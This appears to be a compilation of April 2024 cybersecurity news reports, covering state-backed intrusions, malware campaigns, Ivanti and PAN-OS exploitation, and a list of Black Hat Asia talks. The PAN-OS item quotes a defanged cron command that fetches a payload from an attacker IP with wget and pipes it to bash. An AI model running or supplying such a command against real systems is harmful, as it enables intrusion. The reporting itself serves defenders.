"Although it may seem tempting to leave them as is, these projects tend to have vulnerabilities that are not getting attention and not likely to be fixed."
Police Chiefs Call for Solutions to Access Encrypted Data in Serious Crime Cases
24.4.24
Crime
The Hacker News
European Police Chiefs said that
the complementary partnership between law enforcement agencies and the
technology industry is at risk due to end-to-end encryption (E2EE).
They called on the industry and governments to take urgent action to ensure public safety across social media platforms.
"Privacy measures currently being rolled out, such as end-to-end encryption, will stop tech companies from seeing any offending that occurs on their platforms," Europol said.
"It will also stop law enforcement's ability to obtain and use this evidence in investigations to prevent and prosecute the most serious crimes such as child sexual abuse, human trafficking, drug smuggling, homicides, economic crime, and terrorism offenses."
The idea that E2EE protections could stymie law enforcement is often referred to as the "going dark" problem, triggering concerns it could create new obstacles to gather evidence of nefarious activity.
The development comes against the backdrop of Meta rolling out E2EE in Messenger by default for personal calls and one-to-one personal messages as of December 2023.
The U.K. National Crime Agency (NCA) has since criticized the company's design choices, which made it harder to protect children from sexual abuse online and undermined their ability to investigate crime and keep the public safe from serious threats.
"Encryption can be hugely beneficial, protecting users from a range of crimes," NCA Director General Graeme Biggar said. "But the blunt and increasingly widespread rollout by major tech companies of end-to-end encryption, without sufficient consideration for public safety, is putting users in danger."
Europol's Executive Director Catherine de Bolle noted that tech companies have a social responsibility to develop a safe environment without hampering law enforcement's ability to collect evidence.
The joint declaration also urges the tech industry to build products keeping cybersecurity in mind, but at the same time provide a mechanism for identifying and flagging harmful and illegal content.
"We do not accept that there need be a binary choice between cybersecurity or privacy on the one hand and public safety on the other," the agencies said.
"Our view is that technical solutions do exist; they simply require flexibility from industry as well as from governments. We recognise that the solutions will be different for each capability, and also differ between platforms."
Meta, for what it's worth, already relies on a variety of signals gleaned from unencrypted information and user reports to combat child sexual exploitation on WhatsApp.
Earlier this month, the social media giant also said it's piloting a new set of features in Instagram to protect young people from sextortion and intimate image abuse using client-side scanning.
"Nudity protection uses on-device machine learning to analyze whether an image sent in a DM on Instagram contains nudity," Meta said.
"Because the images are analyzed on the device itself, nudity protection will work in end-to-end encrypted chats, where Meta won't have access to these images – unless someone chooses to report them to us."
German Authorities Issue Arrest Warrants for Three Suspected Chinese Spies
24.4.24
BigBrothers
The Hacker News
German authorities said they have
issued arrest warrants against three citizens on suspicion of spying for China.
The full names of the defendants were not disclosed by the Office of the Federal Prosecutor (aka Generalbundesanwalt), but it includes Herwig F., Ina F., and Thomas R.
"The suspects are strongly suspected of working for a Chinese secret service since an unspecified date before June 2022," the Generalbundesanwalt said.
Thomas R. is believed to have acted as an agent for China's Ministry of State Security (MSS), gathering information about innovative technologies in Germany that could be used for military purposes.
The defendant also sought the help of a married couple, Herwig F. and Ina F., who run a Düsseldorf-based business that established connections with the scientific and research community in Germany.
This materialized in the form of an agreement with an unnamed German university to conduct a study for an unnamed Chinese contractor regarding the operation of high-performance marine engines for use on combat ships.
"At the time of their arrest, the defendants were in further negotiations on research projects that could be useful for expanding China's maritime combat power," the agency said.
"In addition, the defendants purchased a special laser from Germany on behalf of and with payment from the MSS and exported it to China without permission, even though the instrument is subject to the E.U. dual-use regulation."
The development comes as the Generalbundesanwalt announced the arrest of another citizen named Jian G. for acting as an agent for the Chinese Secret Service while working for a German Member of the European Parliament since 2019.
"In January 2024, the accused repeatedly passed on information about negotiations and decisions in the European Parliament to his intelligence client," it said. "In addition, he spied on Chinese opposition members in Germany for the intelligence service."
Last week, the Office of the Federal Prosecutor also executed an arrest warrant against a German-Russian citizen Alexander J. for purported secret service agent activity.
The arrests also follow the charging of Christopher Berry, 32, and Christopher Cash, 29, in the U.K. for passing on sensitive information to China in violation of the Official Secrets Act, according to the Metropolitan Police and the Crown Prosecution Service (CPS).
The two individuals, previously arrested on March 13, 2023, from Oxfordshire and Edinburgh, respectively, and later released on bail, have been accused of sharing "articles, notes, documents, or information" which may have been directly or indirectly useful to an enemy nation.
A spokesperson for the Chinese Embassy told BBC News that the allegations amount to "malicious slander" and urged the U.K. to "stop anti-China political manipulation."
U.S. Imposes Visa Restrictions on 13 Linked to Commercial Spyware Misuse
23.4.24
BigBrothers
The Hacker News
The U.S. Department of State on
Monday said it's taking steps to impose visa restrictions on 13 individuals who
are allegedly involved in the development and sale of commercial spyware or who
are immediately family members of those involved in such businesses.
"These individuals have facilitated or derived financial benefit from the misuse of this technology, which has targeted journalists, academics, human rights defenders, dissidents and other perceived critics, and U.S. Government personnel," the department said.
The names of those subjected to visa restrictions were not disclosed, but the move comes more than two months after the U.S. government said it's enacting a new policy that enforces visa constraints on people engaging in practices that could threaten privacy and freedom of expression.
It also aims to counter the misuse and proliferation of commercial spyware that has been put to use by authoritarian governments to spy on civil society members, in addition to promoting accountability.
The development comes as Israeli publication Haaretz reported that Intellexa presented a proof-of-concept (PoC) system in 2022 called Aladdin that enabled the planting of phone spyware through online ads.
The Intellexa Consortium was sanctioned by the U.S. Department of Treasury's Office of Foreign Assets Control (OFAC) last month for developing, operating, and distributing" commercial spyware designed to target government officials, journalists, and policy experts in the country.
It's not just spyware, as Kaspersky recently reported that 31,031 unique users were affected by stalkerware in 2023, up from 29,312 a year prior, with most of them located in Russia, Brazil, and India – a dubious distinction held by the three countries since 2019.
"Stalkerware products are typically marketed as legitimate anti-theft or parental control apps for smartphones, tablets and computers, but in reality, they are something very different. Installed without the knowledge or consent of the person being tracked, these apps operate stealthily and provide a perpetrator with the means to gain control over a victim's life," the company said.
MITRE Corporation Breached by Nation-State Hackers Exploiting Ivanti Flaws
23.4.24
Exploit
The Hacker News
The MITRE Corporation revealed that
it was the target of a nation-state cyber attack that exploited two zero-day
flaws in Ivanti Connect Secure appliances starting in January 2024.
The intrusion led to the compromise of its Networked Experimentation, Research, and Virtualization Environment (NERVE), an unclassified research and prototyping network.
The unknown adversary "performed reconnaissance of our networks, exploited one of our Virtual Private Networks (VPNs) through two Ivanti Connect Secure zero-day vulnerabilities, and skirted past our multi-factor authentication using session hijacking," Lex Crumpton, a defensive cyber operations researcher at the non-profit, said last week.
The attack entailed the exploitation of CVE-2023-46805 (CVSS score: 8.2) and CVE-2024-21887 (CVSS score: 9.1), which could be weaponized by threat actors to bypass authentication and run arbitrary commands on the infected system.
Upon gaining initial access, the threat actors moved laterally and breached its VMware infrastructure using a compromised administrator account, ultimately paving the way for the deployment of backdoors and web shells for persistence and credential harvesting.
"NERVE is an unclassified collaborative network that provides storage, computing, and networking resources," MITRE said. "Based on our investigation to date, there is no indication that MITRE's core enterprise network or partners' systems were affected by this incident."
The organization said that it has since taken steps to contain the incident, and that it undertook response and recovery efforts as well as forensic analysis to identify the extent of the compromise.
The initial exploitation of the twin flaws has been attributed to a cluster tracked by cybersecurity company Volexity under the name UTA0178, a nation-state actor likely linked to China. Since then, several other China-nexus hacking groups have joined the exploitation bandwagon, according to Mandiant.
"No organization is immune from this type of cyber attack, not even one that strives to maintain the highest cybersecurity possible," Jason Providakes, president and CEO of MITRE, said.
"We are disclosing this incident in a timely manner because of our commitment to operate in the public interest and to advocate for best practices that enhance enterprise security as well as necessary measures to improve the industry's current cyber defense posture."
ToddyCat Hacker Group Uses Advanced Tools for Industrial-Scale Data Theft
23.4.24
APT
The Hacker News
The threat actor known as ToddyCat has been observed using a wide range of tools to retain access to compromised environments and steal valuable data.
Russian cybersecurity firm Kaspersky characterized the adversary as relying on various programs to harvest data on an "industrial scale" from primarily governmental organizations, some of them defense related, located in the Asia-Pacific region.
"To collect large volumes of data from many hosts, attackers need to automate the data harvesting process as much as possible, and provide several alternative means to continuously access and monitor systems they attack," security researchers Andrey Gunkin, Alexander Fedotov, and Natalya Shornikova said.
ToddyCat was first documented by the company in June 2022 in connection with a series of cyber attacks aimed at government and military entities in Europe and Asia since at least December 2020. These intrusions leveraged a passive backdoor dubbed Samurai that allows for remote access to the compromised host.
A closer examination of the threat actor's tradecraft has since uncovered additional data exfiltration tools like LoFiSe and Pcexter to gather data and upload archive files to Microsoft OneDrive.
The latest set of programs entail a mix of tunneling data gathering software, which are put to use after the attacker has already obtained access to privileged user accounts in the infected system. This includes -
Reverse SSH tunnel using OpenSSH
SoftEther VPN, which is renamed to seemingly
innocuous files like "boot.exe," "mstime.exe," "netscan.exe," and
"kaspersky.exe"
Ngrok and Krong to encrypt and redirect command-and-control
(C2) traffic to a certain port on the target system
FRP client, an
open-source Golang-based fast reverse proxy
Cuthead, a .NET compiled
executable to search for documents matching a specific extension or a filename,
or the date when they are modified
WAExp, a .NET program to capture data
associated with the WhatsApp web app and save it as an archive, and
TomBerBil
to extract cookies and credentials from web browsers like Google Chrome and
Microsoft Edge
Maintaining multiple simultaneous connections from the
infected endpoints to actor-controlled infrastructure using different tools is
seen as a fallback mechanism and a way to retain access in cases where one of
the tunnels is discovered and taken down.
"The attackers are actively using techniques to bypass defenses in an attempt to
mask their presence in the system," Kaspersky said.
"To protect the organization's infrastructure, we recommend adding to the firewall denylist the resources and IP addresses of cloud services that provide traffic tunneling. In addition, users must be required to avoid storing passwords in their browsers, as it helps attackers to access sensitive information."
Russia's APT28 Exploited Windows Print Spooler Flaw to Deploy 'GooseEgg' Malware
23.4.24
APT
The Hacker News
The Russia-linked nation-state
threat actor tracked as APT28 weaponized a security flaw in the Microsoft
Windows Print Spooler component to deliver a previously unknown custom malware
called GooseEgg.
The post-compromise tool, which is said to have been used since at least June 2020 and possibly as early as April 2019, leveraged a now-patched flaw that allowed for privilege escalation (CVE-2022-38028, CVSS score: 7.8).
It was addressed by Microsoft as part of updates released in October 2022, with the U.S. National Security Agency (NSA) credited for reporting the flaw at the time.
According to new findings from the tech giant's threat intelligence team, APT28 – also called Fancy Bear and Forest Blizzard (formerly Strontium) – weaponized the bug in attacks targeting Ukrainian, Western European, and North American government, non-governmental, education, and transportation sector organizations.
"Forest Blizzard has used the tool [...] to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions," the company said.
"While a simple launcher application, GooseEgg is capable of spawning other applications specified at the command line with elevated permissions, allowing threat actors to support any follow-on objectives such as remote code execution, installing a backdoor, and moving laterally through compromised networks."
Forest Blizzard is assessed to be affiliated with Unit 26165 of the Russian Federation's military intelligence agency, the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).
Active for nearly 15 years, the Kremlin-backed hacking group's activities are predominantly geared towards intelligence collection in support of Russian government foreign policy initiatives.
In recent months, APT28 hackers have also abused a privilege escalation flaw in Microsoft Outlook (CVE-2023-23397, CVSS score: 9.8) and a code execution bug in WinRAR (CVE-2023-38831, CVSS score: 7.8), indicating their ability to swiftly adopt public exploits into their tradecraft.
"Forest Blizzard's objective in deploying GooseEgg is to gain elevated access to target systems and steal credentials and information," Microsoft said. "GooseEgg is typically deployed with a batch script."
The GooseEgg binary supports commands to trigger the exploit and launch either a provided dynamic-link library (DLL) or an executable with elevated permissions. It also verifies if the exploit has been successfully activated using the whoami command.
The disclosure comes as IBM X-Force revealed new phishing attacks orchestrated by the Gamaredon actor (aka Aqua Blizzard, Hive0051, and UAC-0010) that deliver new iterations of the GammaLoad malware -
GammaLoad.VBS, which is a VBS-based backdoor initiating the infection chain
GammaStager, which is used to download and execute a series of Base64-encoded
VBS payloads
GammaLoadPlus, which is used to run .EXE payloads
GammaInstall, which serves as the loader for a known PowerShell backdoor
referred to as GammaSteel
GammaLoad.PS, a PowerShell implementation of
GammaLoad
GammaLoadLight.PS, a PowerShell variant that contains code to
spread the spread itself to connected USB devices
GammaInfo, a
PowerShell-based enumeration script collecting various information from the host
GammaSteel, a PowerShell-based malware to exfiltrate files from a victim based
on an extension allowlist
"Hive0051 rotates infrastructure through
synchronized DNS fluxing across multiple channels including Telegram, Telegraph
and Filetransfer.io," IBM X-Force researchers said earlier this month, stating
it "points to a potential elevation in actor resources and capability devoted to
ongoing operations."
"It is highly likely Hive0051's consistent fielding of new tools, capabilities and methods for delivery facilitate an accelerated operations tempo."
Microsoft Warns: North Korean Hackers Turn to AI-Fueled Cyber Espionage
22.4.24
AI
The Hacker News
Microsoft has revealed that North
Korea-linked state-sponsored cyber actors has begun to use artificial
intelligence (AI) to make its operations more effective and efficient.
"They are learning to use tools powered by AI large language models (LLM) to make their operations more efficient and effective," the tech giant said in its latest report on East Asia hacking groups.
The company specifically highlighted a group named Emerald Sleet (aka Kimusky or TA427), which has been observed using LLMs to bolster spear-phishing efforts aimed at Korean Peninsula experts.
The adversary is also said to have relied on the latest advancements in AI to research vulnerabilities and conduct reconnaissance on organizations and experts focused on North Korea, joining hacking crews from China, who have turned to AI-generated content for influence operations.
It further employed LLMs to troubleshoot technical issues, conduct basic scripting tasks, and draft content for spear-phishing messages, Redmond said, adding it worked with OpenAI to disable accounts and assets associated with the threat actor.
According to a report published by enterprise security firm Proofpoint last week, the group "engages in benign conversation starter campaigns to establish contact with targets for long-term exchanges of information on topics of strategic importance to the North Korean regime."
Kimsuky's modus operandi involves leveraging think tank and non-governmental organization-related personas to legitimize its emails and increase the likelihood of success of the attack.
In recent months, however, the nation-state actor has begun to abuse lax Domain-based Message Authentication, Reporting, and Conformance (DMARC) policies to spoof various personas and incorporate web beacons (i.e., tracking pixels) for target profiling, indicating its "agility in adjusting its tactics."
"The web beacons are likely intended as initial reconnaissance to validate
targeted emails are active and to gain fundamental information about the
recipients' network environments, including externally visible IP addresses,
User-Agent of the host, and time the user opened the email," Proofpoint said.
The development comes as North Korean hacking groups are continuing to engage in cryptocurrency heists and supply chain attacks, with a threat actor dubbed Jade Sleet linked to the theft of at least $35 million from an Estonian crypto firm in June 2023 and over $125 million from a Singapore-based cryptocurrency platform a month later.
Jade Sleet, which overlaps with clusters tracked as TraderTraitor and UNC4899, has also been observed attacking online cryptocurrency casinos in August 2023, not to mention leveraging bogus GitHub repos and weaponized npm packages to single out employees of cryptocurrency and technology organizations.
In another instance, a Germany-based IT company was compromised by Diamond Sleet (aka Lazarus Group) in August 2023 and weaponized an application from a Taiwan-based IT firm to conduct a supply chain attack in November 2023.
"This is likely to generate revenue, principally for its weapons program, in addition to collecting intelligence on the United States, South Korea, and Japan," Clint Watts, general manager of the Microsoft Threat Analysis Center (MTAC), said.
The Lazarus Group is also notable for employing intricate methods like Windows Phantom DLL Hijacking and Transparency, Consent, and Control (TCC) database manipulation in Windows and macOS, respectively, to undermine security protections and deploy malware, contributing to its sophistication and elusive nature, per Interpres Security.
The findings come against the backdrop of a new campaign orchestrated by the Konni (aka Vedalia) group that uses Windows shortcut (LNK) files to deliver malicious payloads.
"The threat actor utilized double extensions to conceal the original .lnk extension, with the LNK files observed containing excessive whitespace to obscure the malicious command lines," Symantec said. "As part of the attack vector, the command line script searched for PowerShell to bypass detection and locate embedded files and the malicious payload."
New RedLine Stealer Variant Disguised as Game Cheats Using Lua Bytecode for
Stealth
22.4.24
Virus
The Hacker News
A new information stealer has been found leveraging Lua bytecode for added stealth and sophistication, findings from McAfee Labs reveal.
The cybersecurity firm has assessed it to be a variant of a known malware called RedLine Stealer owing to the fact that the command-and-control (C2) server IP address has been previously identified as associated with the malware.
RedLine Stealer, first documented in March 2020, is typically delivered via email and malvertising campaigns, either directly or via exploit kits and loader malware like dotRunpeX and HijackLoader.
The off-the-shelf malware is capable of harvesting information from cryptocurrency wallets, VPN software, and web browsers, such as saved credentials, autocomplete data, credit card information, and geolocations based on the victims' IP addresses.
Over the years, RedLine Stealer has been co-opted by several threat actors into their attack chains, making it a prevalent strain spanning North America, South America, Europe, Asia, and Australia.
The infection sequence identified by McAfee abuses GitHub, using two of Microsoft's official repositories for its implementation of the C++ Standard Library (STL) and vcpkg to host the malware-laden payload in the form of ZIP archives.
It's currently not known how the files came to be uploaded to the repository, but the technique is a sign that threat actors are weaponizing the trust associated with trustworthy repositories to distribute malware. The ZIP files are no longer available for download from the Microsoft repositories.
The ZIP archive ("Cheat.Lab.2.7.2.zip" and "Cheater.Pro.1.6.0.zip") masquerades as a game cheat, indicating that gamers are likely the target of the campaign. It comes fitted with an MSI installer that's designed to run the malicious Lua bytecode.
"This approach provides the advantage of obfuscating malicious stings and avoiding the use of easily recognizable scripts like wscript, JScript, or PowerShell script, thereby enhancing stealth and evasion capabilities for the threat actor," researchers Mohansundaram M. and Neil Tyagi said.
In an attempt to pass the malware to other systems, the MSI installer displays a message urging the victim to share the program with their friends in order to get the unlocked version of the software.
The "compiler.exe" executable within the installer, upon running the Lua bytecode embedded within the "readme.txt" file present in the ZIP archive, sets up persistence on the host using a scheduled task and drops a CMD file, which, in turn, runs "compiler.exe" under another name "NzUw.exe."
In the final stage, "NzUw.exe" initiates communications with a command-and-control (C2) server over HTTP, the aforementioned IP address attributed to RedLine.
The malware functions more like a backdoor, carrying out tasks fetched from the C2 server (e.g., taking screenshots) and exfiltrating the results back to it.
The exact method by which the links to the ZIP archives are distributed is presently unknown. Earlier this month, Checkmarx revealed how threat actors are taking advantage of GitHub's search functionality to trick unsuspecting users into downloading malware-laden repositories.
The development comes as Recorded Future detailed a "large-scale Russian-language cybercrime operation" that singles out the gaming community and leverages fake Web3 gaming lures to deliver malware capable of stealing sensitive information from macOS and Windows users, a technique called trap phishing.
"The campaign involves creating imitation Web3 gaming projects with slight name and branding modifications to appear legitimate, along with fake social media accounts to bolster their authenticity," Insikt Group said.
"The main webpages of these projects offer downloads that, once installed, infect devices with various types of "infostealer" malware such as Atomic macOS Stealer (AMOS), Stealc, Rhadamanthys, or RisePro, depending on the operating system."
It also follows a wave of malware campaigns targeting enterprise environments with loaders such as PikaBot and a new strain called NewBot Loader.
"Attackers demonstrated a diverse range of techniques and infection vectors in each campaign, aiming to deliver the PikaBot payload," McAfee said.
This includes a phishing attack that takes advantage of email conversation hijacking and a Microsoft Outlook flaw called MonikerLink (CVE-2024-21413) to entice victims into downloading the malware from an SMB share.
BLACKHAT 2024 ASIE
20.4.24 BLACKHAT 2024 ASIE KONFERENCE
20.4.24 | Cloud Console Cartographer: Tapping Into Mapping > Slogging Thru Logging | Event logs are a fundamental resource for security professionals seeking to understand the activity occurring in an environment. Cloud logs serve a similar purpose as their on-premise counterparts, though differing significantly in format and granularity between cloud providers. | Congress | ||
20.4.24 | One Flip is All It Takes: Identifying Syscall-Guard Variables for Data-Only Attacks | As control-flow protection techniques are widely deployed, it is difficult for attackers to modify control data, like function pointers, to hijack program control flow. Instead, data-only attacks corrupt security-related non-control data (critical data), and can bypass all control-flow protections to revive severe attacks. | Congress | ||
20.4.24 | What the TrustZone-M Doesn't See, the MCU Does Grieve Over: Lessons Learned from Assessing a Microcontroller TEE | Arm Cortex-M Microcontrollers (MCUs) are the de facto computing units powering billions of small embedded and Internet of Things (IoT) devices. Recently, as a step towards securing devices at scale, Arm introduced the TrustZone technology in the latest generation of their Armv8-M MCUs (e.g., Cortex-M33). | Congress | ||
20.4.24 | You Shall Not PASS - Analysing a NSO iOS Spyware Sample | In September 2023 Apple released iOS 16.6.1 closing actively exploited vulnerabilities. On the same day, CitizenLab released a new blog post about NSO's latest Exploit called BLASTPASS. | Congress | ||
20.4.24 | LLM4Shell: Discovering and Exploiting RCE Vulnerabilities in Real-World LLM-Integrated Frameworks and Apps | In the rapidly evolving landscape of Large Language Models (LLMs), their integration into applications is becoming increasingly common. However, this integration, often facilitated by frameworks such as LangChain and LlamaIndex, poses significant security risks. | Congress | ||
20.4.24 | The Hole in Sandbox: Escape Modern Web-Based App Sandbox From Site-Isolation Perspective | Process isolation is a crucial security feature in the Chrome browser. In the early stages, process isolation was only implemented as out-of-process render (Sandboxed Renderer). With the emergence of new attack methods such as UXSS and Spectre, which can steal or speculate on data from the render process, Chrome introduced the concept of Site Isolation, advocating for a more refined process isolation. | Congress | ||
20.4.24 | The Key to Remote Vehicle Control: Autonomous Driving Domain Controller | Among these developments, the Autonomous Driving Domain Controller is a crucial part. Many smart cars use AI chips like Nvidia Orin and Mobileye EQ5. They employ high-precision GPS, multiple cameras, LiDAR, and other sensors to sense and locate their surroundings, making decisions using algorithms. They control the car's movements, like braking and steering, by sending and receiving CAN messages. | Congress | ||
20.4.24 | Magicdot: A Hacker's Magic Show of Disappearing Dots and Spaces | Backwards compatibility is a key element in Windows. To support that, some known issues stay unfixed for years. We encountered such an issue when we ended a file name with a dot using the NT API. Surprisingly, we couldn't delete, write or rename it. Then, we created a similarly named file without the dot, and like magic, file operations on the first file, affected the new file. | Congress | ||
20.4.24 | A Glimpse Into The Protocol: Fuzz Windows RDP Client For Fun And Profit | At the end of June 2023, we decided to conduct vulnerability research on the Windows RDP client. Initially, we read some publicly available blogs and modified two open-source Windows RDP fuzzing projects. During this process, we successfully identified an old Windows RDP client vulnerability but did not discover any new vulnerabilities. | Congress | ||
20.4.24 | CertifiedDCOM: The Privilege Escalation Journey to Domain Admin with DCOM | Over the past few years, DCOM received a lot of attention in Windows security research. The "Potato" exploits (RottenPotato, JuicyPotato, RoguePotato, RemotePotato , and LocalPotato) and Kerberos Relay attack are both impressive research in this area. | Congress | ||
20.4.24 | Operation PoisonedApple: Tracing Credit Card Information Theft to Payment Fraud | So far, the card information theft groups we are familiar with have typically engaged in illegal replication of stolen cards or selling them on carding shops and the dark web for financial gain. However, the threat group we've been tracking over the past few months has shown some differences. | Congress | ||
20.4.24 | Bad Randomness: Protecting Against Cryptography's Perfect Crime |
Crypto systems are the cornerstone of our digital security
infrastructure, whether they are used to encrypt our data to protect
their confidentiality or for signing to prove data authenticity. | Congress | ||
20.4.24 | Confused Learning: Supply Chain Attacks through Machine Learning Models | All across the world, everyone is pedal-to-the-metal on machine intelligence, almost as though we're still assembling the plane mid-flight. With that being said, there's a lot about machine learning models that might surprise you and definitely surprises many ML and security engineers. | Congress | ||
20.4.24 | Privacy Detective: Sniffing Out Your Data Leaks for Android | Privacy data protection has become a major concern within regions, such as Europe, where GDPR is implemented. To discover the potentially privacy-infringing behaviors, manufacturers must test applications for compliance before release. | Congress | ||
20.4.24 | China's Military Cyber Operations: Has the Strategic Support Force Come of Age? | China's military cyber operations have showcased a noticeable strategic shift in the recent years. The Strategic Support Force (SSF) – the joint information warfare (IW) command of the People's Liberation Army (PLA) – is gradually finding its ground. | Congress | ||
20.4.24 | The Fault in Our Metrics: Rethinking How We Measure Detection & Response | Your metrics are boring and dangerous. Recycled slides with meaningless counts of alerts, incidents, true and false positives… SNOOZE. Even worse, it's motivating your team to distort the truth and subvert progress. This talk is your wake-up call to rethink your detection and response metrics. | Congress | ||
20.4.24 | How to Make Hugging Face to Hug Worms: Discovering and Exploiting Unsafe Pickle.loads over Pre-Trained Large Model Hubs | Hugging Face (HF) has emerged as a popular open platform for maintaining and sharing pre-trained machine learning (ML) models. It fully understands the pickle model deserialization threats originally introduced by Pytorch and accordingly implements pickle scanning for mitigation. In October 2022, Pytorch patched such a threat by white-listing weights-only modules. | Congress | ||
20.4.24 | The Final Chapter: Unlimited ways to bypass your macOS privacy mechanisms | In this talk we return for a third time to talk about bypassing macOS's privacy mechanisms. In the last 4 years we submitted over 100 vulnerabilities to Apple which allowed us to either fully or partially bypass macOS's privacy protection framework (TCC). We gave talks about our findings and various techniques in previous BlackHat conferences. | Congress | ||
20.4.24 | Unveiling the Cracks in Virtualization, Mastering the Host System--VMware Workstation Escape | VMware Workstation is used by software developers and network security practitioners. Users can run dangerous programs in it without affecting the host system. However, if these programs can escape, the host system is no longer safe. If APT attack organizations exploit these vulnerabilities to attack these practitioners, it would be a disaster. | Congress | ||
20.4.24 | Bypassing Entra ID Conditional Access Like APT: A Deep Dive Into Device Authentication Mechanisms for Building Your Own PRT Cookie | Entra ID Conditional Access is a security feature that apply the right access controls for securing Microsoft cloud infrastructure. Conditional Access takes signals from various sources into account when making access decisions. One of the major signals is Deivce; Conditional Access can require device marked as compliant or Microsoft Entra hybrid joined device for authentication. | Congress | ||
20.4.24 | EDR Reloaded: Erase Data Remotely | Endpoint security controls are the most essential tool for protecting computer systems from various malware threats. Most of them usually include several layers of detection modules. Among them is the byte signature detection logic, which is usually treated as the most reliable layer with the lowest false positive rate. | Congress | ||
20.4.24 | SystemUI As EvilPiP: The Hijacking Attacks on Modern Mobile Devices | Android system and anti-virus industry have been struggling with UI security issues, among which Activity Hijack Attack (AHA) is one of the most powerful UI Hijack techniques. In the era of API14~26, BankBot and Spyware could launch zero-cost hijacking attacks on user devices for access sensitive credentials or runtime permissions. | Congress | ||
20.4.24 | Chinese APT: A Master of Exploiting Edge Devices | China-nexus actors have compromised edge devices such as firewall, VPN, IoT devices, etc. against Taiwan Government since 2020 during COVID19, and have compromised those devices to build Botnet, spread disinformation, and exfiltrate sensitive data. However, edge devices belong to closed embedded platforms, and installing antivirus/EDR on those platforms and extracting malware are difficult. | Congress | ||
20.4.24 | Voice Phishing Syndicates Unmasked: An In-Depth Investigation and Exposure | In August 2022, a single voice-phishing incident in South Korea caused $4.1 billion in damages, the largest single cyber incident in the country. Voice phishing attack groups trick victims into installing a malicious app and then convince them to call law enforcement. | Congress | ||
20.4.24 | How to Get the Most Out of the Python Decompilers Uncompyle6 and Decompyle3 - How to Write and Read a Bytecode Decompiler | Uncompyle6, and decompyle3 are the most complete, popular, and accurate open-source Python bytecode decompilers available for the Python versions they support. The underlying cross-platform disassembler they use, xdis, is also unique. | Congress |
Palo Alto Networks Discloses More Details on Critical PAN-OS Flaw Under Attack
20.4.24
Vulnerebility
The Hacker News
Palo Alto Networks has shared more details of a critical security flaw impacting PAN-OS that has come under active exploitation in the wild by malicious actors.
The company described the vulnerability, tracked as CVE-2024-3400 (CVSS score: 10.0), as "intricate" and a combination of two bugs in versions PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 of the software.
"In the first one, the GlobalProtect service did not sufficiently validate the session ID format before storing them. This enabled the attacker to store an empty file with the attacker's chosen filename," Chandan B. N., senior director of product security at Palo Alto Networks, said.
"The second bug (trusting that the files were system-generated) used the filenames as part of a command."
It's worth noting that while neither of the issues are critical enough on their own, when chained together, they could lead to unauthenticated remote shell command execution.
Palo Alto Networks said that the threat actor behind the zero-day exploitation of the flaw, UTA0218, carried out a two-stage attack to achieve command execution on susceptible devices. The activity is being tracked under the name Operation MidnightEclipse.
As previously disclosed by both Volexity and the network security company's own Unit 42 threat intelligence division, this involves sending specially crafted requests containing the command to be executed, which is then run via a backdoor called UPSTYLE.
"The initial persistence mechanism setup by UTA0218 involved configuring a cron job that would use wget to retrieve a payload from an attacker-controlled URL with its output being written to stdout and piped to bash for execution," Volexity noted last week.
"The attacker used this method to deploy and execute specific commands and download reverse proxy tooling such as GOST (GO Simple Tunnel)."
Unit 42 said it has been unable to determine the commands executed via this mechanism – wget -qO- hxxp://172.233.228[.]93/policy | bash – but assessed that the cron job-based implant is likely used to carry out post-exploitation activities.
"In stage 1, the attacker sends a carefully crafted shell command instead of a valid session ID to GlobalProtect," Chandan explained. "This results in creating an empty file on the system with an embedded command as its filename, as chosen by the attacker."
"In stage 2, an unsuspecting scheduled system job that runs regularly uses the attacker-provided filename in a command. This results in the execution of the attacker-supplied command with elevated privileges."
While Palo Alto Networks initially noted that successful exploitation of CVE-2024-3400 required the firewall configurations for GlobalProtect gateway or GlobalProtect portal (or both) and device telemetry enabled, the company has since confirmed that device telemetry has no bearing on the problem.
This is based on new findings from Bishop Fox, which discovered bypasses to weaponize the flaw such that it did not require telemetry to be enabled on a device in order to infiltrate it.
The company has also expanded patches for the flaw over the last few days to cover other commonly deployed maintenance releases -
PAN-OS 10.2.9-h1
PAN-OS 10.2.8-h3
PAN-OS 10.2.7-h8
PAN-OS 10.2.6-h3
PAN-OS 10.2.5-h6
PAN-OS 10.2.4-h16
PAN-OS 10.2.3-h13
PAN-OS 10.2.2-h5
PAN-OS 10.2.1-h2
PAN-OS 10.2.0-h3
PAN-OS 11.0.4-h1
PAN-OS 11.0.4-h2
PAN-OS 11.0.3-h10
PAN-OS 11.0.2-h4
PAN-OS 11.0.1-h4
PAN-OS 11.0.0-h3
PAN-OS 11.1.2-h3
PAN-OS 11.1.1-h1
PAN-OS 11.1.0-h3
In light of the
active abuse of CVE-2024-3400 and the availability of a proof-of-concept (PoC)
exploit code, users are recommended to take steps to apply the hotfixes as soon
as possible to safeguard against potential threats.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also added the shortcoming to its Known Exploited Vulnerabilities (KEV) catalog, ordering federal agencies to secure their devices by April 19, 2024.
According to information shared by the Shadowserver Foundation, approximately 22,542 internet-exposed firewall devices are likely vulnerable to the CVE-2024-3400. A majority of the devices are in the U.S., Japan, India, Germany, the U.K., Canada, Australia, France, and China as of April 18, 2024.
Critical Update: CrushFTP Zero-Day Flaw Exploited in Targeted Attacks
20.4.24
Exploit
The Hacker News
Users of the CrushFTP enterprise
file transfer software are being urged to update to the latest version following
the discovery of a security flaw that has come under targeted exploitation in
the wild.
"CrushFTP v11 versions below 11.1 have a vulnerability where users can escape their VFS and download system files," CrushFTP said in an advisory released Friday. "This has been patched in v11.1.0."
That said, customers who are operating their CrushFTP instances within a DMZ (demilitarized zone) restricted environment are protected against the attacks.
Simon Garrelou of Airbus CERT has been credited with discovering and reporting the flaw. It has yet to be assigned a CVE identifier.
Cybersecurity company CrowdStrike, in a post shared on Reddit, said it has observed an exploit for the flaw being used in the wild in a "targeted fashion."
These intrusions are said to have mainly targeted U.S. entities, with the
intelligence gathering activity suspected to be politically motivated.
"CrushFTP users should continue to follow the vendor's website for the most up-to-date instructions and prioritize patching," CrowdStrike said.
BlackTech Targets Tech, Research, and Gov Sectors New 'Deuterbear' Tool
19.4.24
Hacking
The Hacker News
Technology, research, and government sectors in the Asia-Pacific region have been targeted by a threat actor called BlackTech as part of a recent cyber attack wave.
The intrusions pave the way for an updated version of modular backdoor dubbed Waterbear as well as its enhanced successor referred to as Deuterbear.
